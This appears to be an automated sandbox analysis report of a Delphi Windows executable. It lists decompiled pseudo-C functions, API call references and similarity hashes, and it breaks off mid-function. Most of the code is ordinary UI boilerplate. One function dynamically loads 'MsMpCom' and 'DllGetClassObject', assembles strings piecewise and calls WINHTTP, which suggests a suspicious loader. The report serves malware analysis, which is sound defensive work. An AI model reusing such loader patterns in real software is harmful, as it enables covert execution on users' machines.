                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520E8
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172), ref: 004520FD
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000), ref: 00452112
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00452127
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0045213C
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00452151
                                    • Part of subcall function 0045200C: SetErrorMode.KERNEL32(?,00452179,00008000), ref: 0045216C
                                    • Part of subcall function 00464C44: GetKeyboardLayout.USER32 ref: 00464C89
                                    • Part of subcall function 00464C44: GetDC.USER32(00000000), ref: 00464CDE
                                    • Part of subcall function 00464C44: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00464CE8
                                    • Part of subcall function 00464C44: ReleaseDC.USER32(00000000,00000000), ref: 00464CF3
                                    • Part of subcall function 00465DFC: LoadIconA.USER32 ref: 00465EE1
                                    • Part of subcall function 00465DFC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00452518,00000000,00000000,?,?,00000000,00452580), ref: 00465F13
                                    • Part of subcall function 00465DFC: OemToCharA.USER32 ref: 00465F26
                                    • Part of subcall function 00465DFC: CharNextA.USER32(?), ref: 00465F73
                                    • Part of subcall function 00465DFC: CharLowerA.USER32 ref: 00465F79
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452547
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452558
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterReleaseSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                  • API String ID: 268368413-1126952177
                                  • Opcode ID: 1f2b309a31cb3f4ae20db62dec42fa67b9ea24cf31a5b8eaf59f2768227541fa
                                  • Instruction ID: 91f70a053084b38ab58791255055730202a39e90db144da4f483ee372be90f07
                                  • Opcode Fuzzy Hash: 1f2b309a31cb3f4ae20db62dec42fa67b9ea24cf31a5b8eaf59f2768227541fa
                                  • Instruction Fuzzy Hash: 0C413EB06002099FCB00EFB5D982A9D77B5EB49309B51457BE905E7292E7786904CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0044A548(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                  				char _v68;
                                  				struct _WNDCLASSA _v108;
                                  				intOrPtr _v116;
                                  				signed char _v137;
                                  				void* _v144;
                                  				struct _WNDCLASSA _v184;
                                  				char _v188;
                                  				char _v192;
                                  				char _v196;
                                  				int _t52;
                                  				void* _t53;
                                  				intOrPtr _t86;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				void* _t109;
                                  				intOrPtr* _t111;
                                  				void* _t115;
                                  
                                  				_t109 = __edi;
                                  				_t94 = __ebx;
                                  				_push(__ebx);
                                  				_v196 = 0;
                                  				_t111 = __eax;
                                  				_push(_t115);
                                  				_push(0x44a709);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t115 + 0xffffff40;
                                  				_t95 =  *__eax;
                                  				 *((intOrPtr*)( *__eax + 0x98))();
                                  				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                  					L7:
                                  					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                  					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                  					asm("sbb eax, eax");
                                  					_t53 = _t52 + 1;
                                  					if(_t53 == 0 || E00443A9C != _v184.lpfnWndProc) {
                                  						if(_t53 != 0) {
                                  							UnregisterClassA( &_v68, _v108.hInstance);
                                  						}
                                  						_v108.lpfnWndProc = E00443A9C;
                                  						_v108.lpszClassName =  &_v68;
                                  						if(RegisterClassA( &_v108) == 0) {
                                  							E0040E138(_t94, _t95, _t109, _t111);
                                  						}
                                  					}
                                  					 *0x4a0ce8 = _t111;
                                  					_t96 =  *_t111; // executed
                                  					 *((intOrPtr*)( *_t111 + 0x9c))();
                                  					if( *(_t111 + 0x180) == 0) {
                                  						E0040E138(_t94, _t96, _t109, _t111);
                                  					}
                                  					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                  						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                  					}
                                  					E004096E4( *((intOrPtr*)(_t111 + 0x64)));
                                  					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                  					E0044D8A0(_t111);
                                  					E00447F3C(_t111, E004284A4( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
                                  					_t130 =  *((char*)(_t111 + 0x5c));
                                  					if( *((char*)(_t111 + 0x5c)) != 0) {
                                  						E00403814(_t111, _t130);
                                  					}
                                  					_pop(_t104);
                                  					 *[fs:eax] = _t104;
                                  					_push(0x44a710);
                                  					return E004043D8( &_v196);
                                  				} else {
                                  					_t94 =  *((intOrPtr*)(__eax + 4));
                                  					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                  						L6:
                                  						_v192 =  *((intOrPtr*)(_t111 + 8));
                                  						_v188 = 0xb;
                                  						_t86 =  *0x4bb0a8; // 0x42641c
                                  						E0040656C(_t86, _t95,  &_v196);
                                  						_t95 = _v196;
                                  						E0040CB00(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                  						E00403DEC();
                                  					} else {
                                  						_t108 =  *0x442c24; // 0x442c70
                                  						if(E004037A4(_t94, _t108) == 0) {
                                  							goto L6;
                                  						}
                                  						_v116 = E0044D590(_t94);
                                  					}
                                  					goto L7;
                                  				}
                                  			}

                                  APIs
                                  • GetClassInfoA.USER32(?,?,?), ref: 0044A60C
                                  • UnregisterClassA.USER32(?,?), ref: 0044A634
                                  • RegisterClassA.USER32(?), ref: 0044A64A
                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0044A686
                                  • GetWindowLongA.USER32(00000000,000000F4), ref: 0044A69B
                                  • SetWindowLongA.USER32 ref: 0044A6AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @$p,D
                                  • API String ID: 717780171-2918191434
                                  • Opcode ID: 114ea97c141a6a042801ddeb092bb41519737ce8875b8c03052e97bdecaade63
                                  • Instruction ID: 894eacb346fbdc7464903da9b9a0bb3069fa36e87940c204af087bc266b3aed2
                                  • Opcode Fuzzy Hash: 114ea97c141a6a042801ddeb092bb41519737ce8875b8c03052e97bdecaade63
                                  • Instruction Fuzzy Hash: 4B518271A043549BEB20EF69CC41B9EB7F8AF04308F1445AAF845E7392DB38AD45CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00465DFC(void* __ecx, char __edx) {
                                  				char _v5;
                                  				char* _v12;
                                  				char _v268;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				intOrPtr _t44;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				struct HINSTANCE__** _t58;
                                  				intOrPtr _t63;
                                  				struct HINSTANCE__** _t65;
                                  				char* _t80;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t94;
                                  				intOrPtr* _t95;
                                  				intOrPtr _t96;
                                  				void* _t97;
                                  				char _t99;
                                  				void* _t111;
                                  				void* _t112;
                                  
                                  				_t99 = __edx;
                                  				_t97 = __ecx;
                                  				if(__edx != 0) {
                                  					_t112 = _t112 + 0xfffffff0;
                                  					_t44 = E00403984(_t44, _t111);
                                  				}
                                  				_v5 = _t99;
                                  				_t96 = _t44;
                                  				E00424FB8(_t97, 0);
                                  				_t47 =  *0x4baf7c; // 0x4a05ac
                                  				if( *((short*)(_t47 + 2)) == 0) {
                                  					_t95 =  *0x4baf7c; // 0x4a05ac
                                  					 *((intOrPtr*)(_t95 + 4)) = _t96;
                                  					 *_t95 = 0x46750c;
                                  				}
                                  				_t48 =  *0x4bb070; // 0x4a05b4
                                  				if( *((short*)(_t48 + 2)) == 0) {
                                  					_t94 =  *0x4bb070; // 0x4a05b4
                                  					 *((intOrPtr*)(_t94 + 4)) = _t96;
                                  					 *_t94 = E00467704;
                                  				}
                                  				 *((char*)(_t96 + 0x34)) = 0;
                                  				 *((intOrPtr*)(_t96 + 0x90)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t96 + 0xa8)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t96 + 0x60)) = 0;
                                  				 *((intOrPtr*)(_t96 + 0x84)) = 0;
                                  				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
                                  				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
                                  				 *((char*)(_t96 + 0x7c)) = 1;
                                  				 *((intOrPtr*)(_t96 + 0x80)) = 0;
                                  				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
                                  				 *((char*)(_t96 + 0x88)) = 0;
                                  				 *((char*)(_t96 + 0x9d)) = 1;
                                  				 *((char*)(_t96 + 0xb4)) = 1;
                                  				 *((intOrPtr*)(_t96 + 0x98)) = E0042EE88(1);
                                  				_t58 =  *0x4bae44; // 0x4bc030
                                  				E0042F258(_t57, LoadIconA( *_t58, "MAINICON"));
                                  				_t20 = _t96 + 0x98; // 0x736d
                                  				_t63 =  *_t20;
                                  				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
                                  				 *((intOrPtr*)(_t63 + 0x10)) = 0x467d54;
                                  				_t65 =  *0x4bae44; // 0x4bc030
                                  				GetModuleFileNameA( *_t65,  &_v268, 0x100);
                                  				OemToCharA( &_v268,  &_v268);
                                  				_v12 = E0040D990( &_v268, _t97, 0x5c);
                                  				if(_v12 != 0) {
                                  					E004094A8( &_v268, _v12 + 1);
                                  				}
                                  				_v12 = E0040D9D8( &_v268, _t97, 0x2e);
                                  				if(_v12 != 0) {
                                  					 *_v12 = 0;
                                  				}
                                  				CharLowerA(CharNextA( &_v268));
                                  				_t36 = _t96 + 0x8c; // 0x45e140
                                  				E00404648(_t36, 0x100,  &_v268);
                                  				_t80 =  *0x4bac9c; // 0x4bc038
                                  				if( *_t80 == 0) {
                                  					E00466118(_t96, _t96, 0x100); // executed
                                  				}
                                  				 *((char*)(_t96 + 0x59)) = 1;
                                  				 *((char*)(_t96 + 0x5a)) = 1;
                                  				 *((char*)(_t96 + 0x5b)) = 1;
                                  				 *((char*)(_t96 + 0x9e)) = 1;
                                  				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
                                  				E00467F30(_t96, 0x100);
                                  				E00468918(_t96);
                                  				_t86 = _t96;
                                  				if(_v5 != 0) {
                                  					E004039DC(_t86);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t96;
                                  			}

                                  APIs
                                  • LoadIconA.USER32 ref: 00465EE1
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00452518,00000000,00000000,?,?,00000000,00452580), ref: 00465F13
                                  • OemToCharA.USER32 ref: 00465F26
                                  • CharNextA.USER32(?), ref: 00465F73
                                  • CharLowerA.USER32 ref: 00465F79
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Char$FileIconLoadLowerModuleNameNext
                                  • String ID: MAINICON$PvB
                                  • API String ID: 3256280155-1317487111
                                  • Opcode ID: ed063bfdf8bd201a24e0adf7ee449aa88e7f5230faca0e6a04a106bd78ad6817
                                  • Instruction ID: fbcd5f350cf006d78cb94b64e2a8b9aba4bce68d871928c9f442a7a90706e942
                                  • Opcode Fuzzy Hash: ed063bfdf8bd201a24e0adf7ee449aa88e7f5230faca0e6a04a106bd78ad6817
                                  • Instruction Fuzzy Hash: 0B51B370A042448FDB40DF39C8857C97BE4AB15308F4440FAE848DF357DBB99988CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0049E918(void* __ebx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				intOrPtr _t61;
                                  				intOrPtr _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t86;
                                  				intOrPtr _t88;
                                  				signed int _t92;
                                  				intOrPtr _t98;
                                  				void* _t101;
                                  				intOrPtr _t135;
                                  				intOrPtr _t147;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  
                                  				_t152 = __esi;
                                  				_t100 = __ebx;
                                  				_t154 = _t155;
                                  				_t101 = 8;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t101 = _t101 - 1;
                                  				} while (_t101 != 0);
                                  				_push(_t154);
                                  				_push(0x49eb7d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t155;
                                  				0;
                                  				0;
                                  				0;
                                  				E0049DED8(4, 5);
                                  				E0049E598(0x64);
                                  				_t157 =  *0x4bccd4 - 0x87a68e;
                                  				if( *0x4bccd4 <= 0x87a68e) {
                                  					0;
                                  					0;
                                  					E0040442C(0x4bcd38, 0x49eb90);
                                  					E0049E4F4("MsMpCom", __ebx, 0x4bcccc, "DllGetClassObject", __esi); // executed
                                  					E0049DE48(0x49ebc8, __ebx,  &_v36, 0, __esi, __eflags);
                                  					E0049DE48(0x49ebd4, __ebx,  &_v32, _v36, __esi, __eflags);
                                  					E0049DE48(0x49ebe0, _t100,  &_v28, _v32, _t152, __eflags);
                                  					E0049DE48(0x49ebec, _t100,  &_v24, _v28, _t152, __eflags);
                                  					E0049DE48(0x49ebf8, _t100,  &_v20, _v24, _t152, __eflags);
                                  					E0049DE48(0x49ec04, _t100,  &_v16, _v20, _t152, __eflags);
                                  					E0049DE48(0x49ebf8, _t100,  &_v12, _v16, _t152, __eflags);
                                  					E0049DE48(0x49ec10, _t100,  &_v8, _v12, _t152, __eflags);
                                  					E0049E4F4(_v8, _t100, 0x4bcccc, "DllGetClassObject", _t152); // executed
                                  					__eflags =  *0x4bccd4 - 4;
                                  					if(__eflags > 0) {
                                  						L6:
                                  						0;
                                  						_t61 =  *0x4bcce4; // 0x0
                                  						_push(E00408EB4(_t61, __eflags));
                                  						L0049DE38();
                                  					} else {
                                  						__eflags = 0;
                                  						E0049DE48(0x49ec1c, _t100,  &_v44, 0, _t152, 0);
                                  						E0049DE48(0x49ec1c, _t100,  &_v40, _v44, _t152, __eflags);
                                  						_t70 =  *0x4bcce4; // 0x0
                                  						E004047E4(_t70, _v40);
                                  						if(__eflags != 0) {
                                  							_t72 =  *0x4bcccc; // 0x0
                                  							E0049E8CC(_t72,  &_v40, 0x4bcdc0);
                                  							 *0x4bcce8 = E0042D2EC(1);
                                  							__eflags = 0;
                                  							E0049DE48(0x49ec28, _t100,  &_v64, 0, _t152, 0);
                                  							E0049DE48(0x49ec34, _t100,  &_v60, _v64, _t152, __eflags);
                                  							E0049DE48(0x49ec40, _t100,  &_v56, _v60, _t152, __eflags);
                                  							E0049DE48(0x49ec4c, _t100,  &_v52, _v56, _t152, __eflags);
                                  							E0049DE48(0x49ec4c, _t100,  &_v48, _v52, _t152, __eflags);
                                  							_t147 =  *0x4bc668; // 0x400000
                                  							_t86 =  *0x4bcce8; // 0x1c42718
                                  							E0042DDC8(_t86, _t100, _t147, __edi, _t152, __eflags);
                                  							_t88 =  *0x4bcce8; // 0x1c42718
                                  							E0049E67C(_t88,  &_v68, __eflags);
                                  							E0040442C(0x4bcd38, _v68);
                                  							_t92 =  *0x4bcd38; // 0x1c4cb04
                                  							E0049DA04(_t92, _t100, _v48, __edi, _t152);
                                  							E00402D04(0x4a1484, 1, E004048F0(0x4bcd5c));
                                  						} else {
                                  							goto L6;
                                  						}
                                  					}
                                  				} else {
                                  					0;
                                  					0;
                                  					_t98 =  *0x4bcce4; // 0x0
                                  					_push(E00408EB4(_t98, _t157));
                                  					L0049DE40();
                                  				}
                                  				_pop(_t135);
                                  				 *[fs:eax] = _t135;
                                  				_push(0x49eb84);
                                  				return E004043FC( &_v68, 0x10);
                                  			}

                                  APIs
                                  • 6DAC1E03.MF(00000000,00000000,0049EB7D,?,00000000,00000000), ref: 0049E980
                                    • Part of subcall function 0049E4F4: LoadLibraryA.KERNEL32(00000000), ref: 0049E532
                                    • Part of subcall function 0049E4F4: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0049E589), ref: 0049E53A
                                    • Part of subcall function 0049E4F4: GetProcAddress.KERNEL32(70600000,00000000,00000000,00000000,00000000,0049E589), ref: 0049E567
                                  • 706E3434.WINHTTP(00000000,00000000,0049EB7D,?,00000000,00000000), ref: 0049EA96
                                  Strings
                                  • DllGetClassObject, xrefs: 0049E9AA, 0049EA40
                                  • MsMpCom, xrefs: 0049E9AF
                                  • RTOVRLTGJQTCDKSLFTUWQKLRRUTLRTLSIDQBPLOYUDNVLFAXKNFUVJWPSTDCPITORKIVJMAZVPGRMTEXGVFTLSKSBFUEOCUFHMBJPIQGZPMOPXYCKQVEVCNDCMRSCOEEPAYXTDLOBXZXGKHKQUXSXUJUSIAGDJQKAMAXVSEPKOZZCDEENWCDIPQQERLASAXFYADZQIZZWXYNBWSERDYINTQLHSTYADXFQPYVRTTDQNQZGOBMPRTOVRLTGJQTCDKSLFTU, xrefs: 0049EB53
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressE3434HandleLibraryLoadModuleProc
                                  • String ID: DllGetClassObject$MsMpCom$RTOVRLTGJQTCDKSLFTUWQKLRRUTLRTLSIDQBPLOYUDNVLFAXKNFUVJWPSTDCPITORKIVJMAZVPGRMTEXGVFTLSKSBFUEOCUFHMBJPIQGZPMOPXYCKQVEVCNDCMRSCOEEPAYXTDLOBXZXGKHKQUXSXUJUSIAGDJQKAMAXVSEPKOZZCDEENWCDIPQQERLASAXFYADZQIZZWXYNBWSERDYINTQLHSTYADXFQPYVRTTDQNQZGOBMPRTOVRLTGJQTCDKSLFTU
                                  • API String ID: 58649982-2623530818
                                  • Opcode ID: a0efa33bc577e04e83678bcbe7b09e1bd558a321a04c4056c38e9b2e4590ea8a
                                  • Instruction ID: 990c060cecdcbde1e60e902d0f133ebbe8d53669c78b51cb49a40539e04bd0b2
                                  • Opcode Fuzzy Hash: a0efa33bc577e04e83678bcbe7b09e1bd558a321a04c4056c38e9b2e4590ea8a
                                  • Instruction Fuzzy Hash: 2B514334A005099BCF04EBAAD4C199E7F71EB99308F50853BF501AB351DE3CAD068B6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004616BC(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				void* _t41;
                                  				void* _t54;
                                  				void* _t61;
                                  				struct HMENU__* _t64;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t87;
                                  				void* _t92;
                                  				intOrPtr _t97;
                                  				void* _t110;
                                  				intOrPtr _t112;
                                  				void* _t115;
                                  
                                  				_t93 = 0;
                                  				_v20 = 0;
                                  				_t112 = __edx;
                                  				_t92 = __eax;
                                  				_push(_t115);
                                  				_push(0x461882);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t115 + 0xfffffff0;
                                  				if(__edx == 0) {
                                  					L7:
                                  					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                  					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                  						E0045B168(_t39, 0, 0);
                                  					}
                                  					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
                                  						_t112 = 0;
                                  					}
                                  					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
                                  					if(_t112 != 0) {
                                  						E00425088(_t112, _t92);
                                  					}
                                  					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                  						_t41 = E0044D894(_t92);
                                  						__eflags = _t41;
                                  						if(_t41 != 0) {
                                  							SetMenu(E0044D590(_t92), 0);
                                  						}
                                  						goto L30;
                                  					} else {
                                  						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                  							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                  								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                  								if( *((char*)(_t92 + 0x22f)) != 1) {
                                  									_t54 = E0044D894(_t92);
                                  									__eflags = _t54;
                                  									if(_t54 != 0) {
                                  										SetMenu(E0044D590(_t92), 0);
                                  									}
                                  								}
                                  								goto L30;
                                  							}
                                  							goto L21;
                                  						} else {
                                  							L21:
                                  							if(E0044D894(_t92) != 0) {
                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  								_t64 = GetMenu(E0044D590(_t92));
                                  								_t137 = _t61 - _t64;
                                  								if(_t61 != _t64) {
                                  									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  									SetMenu(E0044D590(_t92), _t70); // executed
                                  								}
                                  								E0045B168(_t112, E0044D590(_t92), _t137);
                                  							}
                                  							L30:
                                  							if( *((char*)(_t92 + 0x22e)) != 0) {
                                  								E00462788(_t92, 1);
                                  							}
                                  							E004615F4(_t92);
                                  							_pop(_t97);
                                  							 *[fs:eax] = _t97;
                                  							_push(0x461889);
                                  							return E004043D8( &_v20);
                                  						}
                                  					}
                                  				}
                                  				_t77 =  *0x4bcb80; // 0x1c40e90
                                  				_t79 = E00464EF0(_t77) - 1;
                                  				if(_t79 >= 0) {
                                  					_v8 = _t79 + 1;
                                  					_t110 = 0;
                                  					do {
                                  						_t81 =  *0x4bcb80; // 0x1c40e90
                                  						if(_t112 ==  *((intOrPtr*)(E00464EDC(_t81, _t110) + 0x248))) {
                                  							_t83 =  *0x4bcb80; // 0x1c40e90
                                  							if(_t92 != E00464EDC(_t83, _t110)) {
                                  								_v16 =  *((intOrPtr*)(_t112 + 8));
                                  								_v12 = 0xb;
                                  								_t87 =  *0x4bade4; // 0x42663c
                                  								E0040656C(_t87, _t93,  &_v20);
                                  								_t93 = _v20;
                                  								E0040CB00(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
                                  								E00403DEC();
                                  							}
                                  						}
                                  						_t110 = _t110 + 1;
                                  						_t10 =  &_v8;
                                  						 *_t10 = _v8 - 1;
                                  					} while ( *_t10 != 0);
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID: <fB
                                  • API String ID: 3688185913-2034575739
                                  • Opcode ID: aa6f627a01b7cbee9e5e067dd656252ef2fe770bb74a164e345a9a1e29d40d0c
                                  • Instruction ID: 6bf96854945917256a8ccdf68c0af53f171b62af739f0e36b70eecfbd3614060
                                  • Opcode Fuzzy Hash: aa6f627a01b7cbee9e5e067dd656252ef2fe770bb74a164e345a9a1e29d40d0c
                                  • Instruction Fuzzy Hash: CE519A30A042405BDB60FF7AD88575A77A5AF44348F0845BBEC059B3A7EA7CDC44879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00426168(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                  				struct _WNDCLASSA _v44;
                                  				struct HINSTANCE__* _t6;
                                  				CHAR* _t8;
                                  				struct HINSTANCE__* _t9;
                                  				int _t10;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HWND__* _t15;
                                  				struct HINSTANCE__* _t19;
                                  				CHAR* _t20;
                                  				struct HWND__* _t22;
                                  				CHAR* _t24;
                                  
                                  				_t6 =  *0x4bc668; // 0x400000
                                  				 *0x4a05e8 = _t6;
                                  				_t8 =  *0x4a05fc; // 0x426158
                                  				_t9 =  *0x4bc668; // 0x400000
                                  				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                  				asm("sbb eax, eax");
                                  				_t11 = _t10 + 1;
                                  				if(_t11 == 0 || L0040703C != _v44.lpfnWndProc) {
                                  					if(_t11 != 0) {
                                  						_t19 =  *0x4bc668; // 0x400000
                                  						_t20 =  *0x4a05fc; // 0x426158
                                  						UnregisterClassA(_t20, _t19);
                                  					}
                                  					RegisterClassA(0x4a05d8);
                                  				}
                                  				_t13 =  *0x4bc668; // 0x400000
                                  				_t24 =  *0x4a05fc; // 0x426158
                                  				_t15 = E004075CC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
                                  				_t22 = _t15;
